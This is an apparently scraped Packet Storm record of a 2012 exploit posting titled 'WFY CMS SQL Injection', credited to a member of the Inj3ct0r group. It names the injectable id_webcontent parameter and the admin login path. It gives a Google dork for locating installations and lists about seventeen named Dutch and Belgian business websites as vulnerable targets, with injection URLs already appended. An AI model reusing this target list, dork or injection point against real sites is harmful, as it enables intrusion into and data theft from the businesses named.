{"id": "PACKETSTORM:110670", "type": "packetstorm", "bulletinFamily": "exploit", "title": "WFY CMS SQL Injection", "description": "", "published": "2012-03-11T00:00:00", "modified": "2012-03-11T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/110670/WFY-CMS-SQL-Injection.html", "reporter": "the_cyber_nuxbie", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:16:32", "viewCount": 1, "enchantments": {"score": {"value": 0.2, "vector": "NONE", "modified": "2016-11-03T10:16:32", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:16:32", "rev": 2}, "vulnersScore": 0.2}, "sourceHref": "https://packetstormsecurity.com/files/download/110670/wfycms-sql.txt", "sourceData": "`1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 \n0 _ __ __ __ 1 \n1 /' \\ __ /'__`\\ /\\ \\__ /'__`\\ 0 \n0 /\\_, \\ ___ /\\_\\/\\_\\ \\ \\ ___\\ \\ ,_\\/\\ \\/\\ \\ _ ___ 1 \n1 \\/_/\\ \\ /' _ `\\ \\/\\ \\/_/_\\_<_ /'___\\ \\ \\/\\ \\ \\ \\ \\/\\`'__\\ 0 \n0 \\ \\ \\/\\ \\/\\ \\ \\ \\ \\/\\ \\ \\ \\/\\ \\__/\\ \\ \\_\\ \\ \\_\\ \\ \\ \\/ 1 \n1 \\ \\_\\ \\_\\ \\_\\_\\ \\ \\ \\____/\\ \\____\\\\ \\__\\\\ \\____/\\ \\_\\ 0 \n0 \\/_/\\/_/\\/_/\\ \\_\\ \\/___/ \\/____/ \\/__/ \\/___/ \\/_/ 1 \n1 \\ \\____/ >> Exploit database separated by exploit 0 \n0 \\/___/ type (local, remote, DoS, etc.) 1 \n1 1 \n0 [+] Official Website: http://www.1337day.com 0 \n1 [+] Support E-mail : mr.inj3ct0r[at]gmail.com 1 \n0 0 \n1 ########################################## 1 \n0 I'm NuxbieCyber Member From Inj3ct0r Team 1 \n1 ########################################## 0 \n0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 \n \n[ WFYCMS - SQL Injection Vulnerability ] \n \n[x] Author : the_cyber_nuxbie \n[x] Home : www.thecybernuxbie.com \n[x] E-mail : staff@thecybernuxbie.com \n[x] Found : 11 March 2012 @ 12:39 PM. \n[x] Tested : Back|Track 5. \n[x] Dork : inurl:\"/main1.php?id_webcontent=\" intext:\"Powered by WFY\" \n________________________________________________________________________ \n************************************************************************ \n \n- Exploit Report: \nhttp://localhost/WebApps/main1.php?id_webcontent=[SQL Injection] \n \n- Private Area: \nhttp://localhost/WebApps/admin/ <--- LogIn Area...!!! \n \n- Sample WebApps Vuln SQLi: \nhttp://autoaccent.nl/main1.php?id_webcontent=1' + [SQL Injection] \nhttp://bodyboomers.nl/main1.php?id_webcontent=25' + [SQL Injection] \nhttp://cafedekrim.nl/main1.php?id_webcontent=22' + [SQL Injection] \nhttp://codyparts.nl/main1.php?id_webcontent=42' + [SQL Injection] \nhttp://do-in.nl/main1.php?id_webcontent=22' + [SQL Injection] \nhttp://geodrilling.nl/main1.php?id_webcontent=21' + [SQL Injection] \nhttp://klokdriebergen.nl/main1.php?id_webcontent=1' + [SQL Injection] \nhttp://lichtreclamezuilen.nl/main1.php?id_webcontent=21' + [SQL Injection] \nhttp://maesbouviers.be/main1.php?id_webcontent=24' + [SQL Injection] \nhttp://mdinternetservice.nl/main1.php?id_webcontent=4' + [SQL Injection] \nhttp://minderwegenin2009.nl/main1.php?id_webcontent=24' + [SQL Injection] \nhttp://parketgallery.nl/main1.php?id_webcontent=23' + [SQL Injection] \nhttp://savelkoulsspeeltoestellen.nl/main1.php?id_webcontent=21' + [SQL Injection] \nhttp://schaajcomputers.nl/main1.php?id_webcontent=37' + [SQL Injection] \nhttp://succesvolwerken.nl/main1.php?id_webcontent=21' + [SQL Injection] \nhttp://tulnerstukadoors.nl/main1.php?id_webcontent=21' + [SQL Injection] \nhttp://wimboelenstuinaanleg.nl/main1.php?id_webcontent=21' + [SQL Injection] \n, And Many More @ Google...!!! \n \n- Greetz: \n*** 1337day Inject0r TEAM *** \n...:::' All Member & Staff Inject0r TEAM ':::... \n`\n"}

{}